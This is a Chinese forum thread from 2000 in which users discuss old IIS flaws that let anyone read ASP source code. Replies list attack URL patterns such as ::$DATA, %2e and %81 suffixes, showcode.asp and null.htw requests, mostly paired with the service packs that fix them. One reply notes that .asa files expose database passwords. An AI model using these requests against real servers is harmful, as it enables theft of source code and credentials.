社区
ASP
帖子详情
查看asp源代码
Focus_zhao
2000-07-23 08:58:00
我在一本书上看到说ASP的安全性很差,后面加个::$DATA就可以看到源代码了。我试了一下,在地址后加上了?::$DATA,可是没什么效果。请问这里有没有人知道这个参数怎么用?多谢。
...全文
749
12
打赏
收藏
查看asp源代码
我在一本书上看到说ASP的安全性很差,后面加个::$DATA就可以看到源代码了。我试了一下,在地址后加上了?::$DATA,可是没什么效果。请问这里有没有人知道这个参数怎么用?多谢。
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
12 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
april_d
2001-11-19
打赏
举报
回复
try
堆堆
2000-07-26
打赏
举报
回复
null.htw和idq有什么漏洞?
Cobra
2000-07-26
打赏
举报
回复
可以试试下面的7种方法
1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp 解决方案:删除showcode.asp
2、http://somewhere/something.asp::$DATA 解决方案: 装sp3
3、http://somewhere/something.asp%2e 解决方案: 装sp4
或者 http://somewhere/something.asp.(加一个点) 解决方案: 装sp4
4、 http://somewhere/something%2e%41sp
或者L http://somewhere/something%2e%asp 解决方案: 装sp4
5、http://somewhere/something.asp%81 解决方案:装sp6或者打补丁
6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp
7.http://somewhere/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
最大的危害莫过于asa文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;
yagami
2000-07-26
打赏
举报
回复
null.htw能得到ASP代码.idq能得到网站的目录结构.
netsong
2000-07-24
打赏
举报
回复
装上了sp6就修正了这个bug。
有时对于sp4,用::$DATA查看时白屏,可查看原文件获得asp源程序
Tyro
2000-07-24
打赏
举报
回复
这个办法已经过时了,只有很少的网站能够用这个办法看到源码,大部分网站已经补上了这个漏洞
Focus_zhao
2000-07-24
打赏
举报
回复
没明白,请具体讲讲,用了那个参数之后再做什末才能看到代码?
yagami
2000-07-24
打赏
举报
回复
null.htw呢?
www.csdn.net也不过是前不久才打的补丁.外面没有打补丁的站多了.Service Pack又不是万能的.
还有idq漏洞.这个洞expert.csdn.net也没有补.一样可以拿到源代码的.我才没空搞破坏了.不过请csdn站长注意了!
yagami
2000-07-24
打赏
举报
回复
::$DATA已是很老的一种.还有:
%81
%2e
%2e%41sp
code.asp
showcode.asp
null.htw
longhtr
some.asp.bak
dvwssr.dll
具体的你去看<<高手们、黑客们、难题!!!(2)>>这帖好了.
siva
2000-07-23
打赏
举报
回复
csdn有相关文章,找找去吧
mjs2000
2000-07-23
打赏
举报
回复
IIS是一个问题,如果你的IIS版本低只要你装了Sp5或Sp6都不会让你用::$DATA查看原代码。
dark
2000-07-23
打赏
举报
回复
看你用的IIS是什么版本了,微软已修正了这个BUG了
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET开发典型模块大全 (修订版) (
源代码
)
光盘提供了书中所有案例的全部
源代码
,并经过精心调试,在windows xp和windows 2000下全部通过,保证能够正常运行。此外,光盘中还提供有编程词典试用版软件。 《
ASP
.NET开发典型模块大全(修订版)》案例涉及领域...
ASP
.NET通用权限管理系统
源代码
(含文档、数据库)
ASP
.NET通用权限管理系统
源代码
(含文档、数据库) 1.菜单导航管理 2.操作按钮 3.角色管理 4.部门管理 5.用户管理(用户权限) 6.用户组管理(设置成员,用户组权限) 7.系统配置(动态配置系统参数) 8.附加属性...
MVC4 项目
源代码
asp
.net mvc4
源代码
很适合初学者 有很详细的注释 开发必备
实战突击
ASP
.NET 项目开发案例整合
源代码
明日科技
说明:《实战突击
ASP
.NET 项目开发案例整合》 随书
源代码
人民邮电出版社 明日科技出版
ASP
28,391
社区成员
357,060
社区内容
发帖
与我相关
我的任务
ASP
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
复制链接
扫一扫
分享
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章